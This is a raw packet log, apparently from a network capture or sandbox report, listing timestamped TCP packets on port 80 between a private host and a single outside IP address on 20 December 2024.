                                                                                                                      Dec 20, 2024 21:17:50.340648890 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340656996 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340665102 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340676069 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340785980 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340794086 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340833902 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340842962 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340893984 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340903044 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340918064 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340944052 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340996981 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341006041 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341161013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341170073 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341177940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341187000 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341198921 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341221094 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341289043 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341298103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341376066 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341432095 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341489077 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341497898 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341531038 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341559887 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341718912 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341727972 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341742039 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341778994 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341787100 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341798067 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341882944 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341892004 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341898918 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341907978 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342005014 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342015982 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342025042 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342034101 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342045069 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342053890 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.349133015 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.349963903 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.457660913 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.457758904 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.457767963 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.457799911 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.457931995 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.457941055 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458000898 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458009958 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458101988 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458111048 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458189011 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458251953 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458261967 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458367109 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458375931 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458388090 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458538055 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458549976 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458565950 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458575964 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458682060 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458723068 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458827972 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458837986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458970070 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.458978891 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.459007025 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.459016085 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.459075928 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.459192038 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.469139099 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.469211102 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.469528913 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.469619989 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.469784975 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.589267015 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.816941023 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.936840057 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.936886072 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.936923027 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:51.449246883 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:51.449758053 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:51.569257021 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:51.746090889 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:51.801157951 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:51.801249981 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:51.856368065 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:51.910474062 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:51.920713902 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:51.920931101 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:51.980393887 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.035507917 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.095649958 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.096525908 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.215712070 CET804975237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.215790987 CET4975280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.216080904 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.216173887 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.216418982 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.337069988 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.566857100 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.586940050 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.587888956 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.686863899 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.686908007 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.686943054 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.708446980 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:52.941960096 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:52.995208025 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.035461903 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.061628103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.061952114 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.502317905 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.551105976 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.714708090 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.715536118 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.740586996 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.785469055 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.835243940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.861468077 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.862258911 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.981710911 CET804975337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.982033014 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:53.982136965 CET4975380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.982187033 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:53.982399940 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:54.066867113 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:54.102061033 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.122093916 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.176069021 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:54.186645985 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.186702013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.332503080 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:54.452406883 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.452538013 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.452569008 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.842910051 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:54.847480059 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:54.967722893 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.195585012 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.254381895 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.263159990 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.301119089 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.316653967 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.316701889 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.316797018 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.496340036 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.551125050 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.615667105 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.616525888 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.736166000 CET804975437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.736265898 CET4975480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.736489058 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.736573935 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.736916065 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:55.856667042 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.983545065 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:55.984600067 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:56.082638979 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:56.104389906 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:56.202385902 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:56.202419043 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:56.202446938 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:56.332468987 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:56.391587973 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:56.441699982 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:56.452372074 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:56.452414989 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.007005930 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.051070929 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.116878986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.117763042 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.350944042 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.350961924 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.394835949 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.471828938 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.472536087 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.473063946 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.525409937 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.566781044 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.592011929 CET804975537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.592099905 CET4975580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.592155933 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.592241049 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.592416048 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.592946053 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.592959881 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.712337017 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.941822052 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:57.950368881 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:57.951922894 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:58.061794043 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.061839104 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.061868906 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.071857929 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.301172972 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:58.358438015 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.410449982 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:58.420772076 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.420905113 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.868313074 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:58.910453081 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.079356909 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.082902908 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.100508928 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.144877911 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.202939034 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.219836950 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.220662117 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.339747906 CET804975637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.339802027 CET4975680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.340131044 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.340208054 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.340363979 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.441828012 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.459923029 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.489970922 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.535458088 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.561562061 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.561619997 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.691917896 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:59.811887026 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.811923027 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:59.811939001 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.213094950 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.214010954 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:00.333798885 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.576739073 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:00.611469984 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.620850086 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.660455942 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:00.661587000 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:00.696619034 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.696656942 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.844304085 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:00.894998074 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:00.971209049 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:00.972035885 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.091598034 CET804975737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.091682911 CET4975780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.091744900 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.091828108 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.091998100 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.211600065 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.343547106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.344772100 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.441941023 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.464602947 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.561762094 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.561806917 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.561836958 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.691833973 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.751668930 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.801091909 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:01.811570883 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:01.811629057 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.360949039 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.410453081 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.471388102 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.472234011 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.591854095 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.596409082 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.644843102 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.718916893 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.719722986 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.817949057 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.842106104 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.842268944 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.842959881 CET804975837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.843030930 CET4975880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.843666077 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.878721952 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.926075935 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:02.937541008 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.937603951 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:02.963102102 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:03.192776918 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:03.312495947 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:03.312515020 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:03.312527895 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:03.592873096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:03.593856096 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:03.713496923 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:03.941850901 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.000437021 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.051084042 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.061338902 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.061511993 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.112340927 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.160482883 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.344494104 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.394825935 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.471136093 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.472023964 CET4976080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.591805935 CET804975937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.591824055 CET804976037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.591866970 CET4975980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.591934919 CET4976080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.592092991 CET4976080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.711895943 CET804976037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.718189001 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.718976021 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:04.839119911 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:04.942029953 CET4976080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:05.061861038 CET804976037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:05.061892986 CET804976037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:05.061924934 CET804976037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:05.066849947 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:05.126379013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:05.176070929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:05.186528921 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:05.186660051 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:05.846785069 CET804973237.44.238.250192.168.2.4
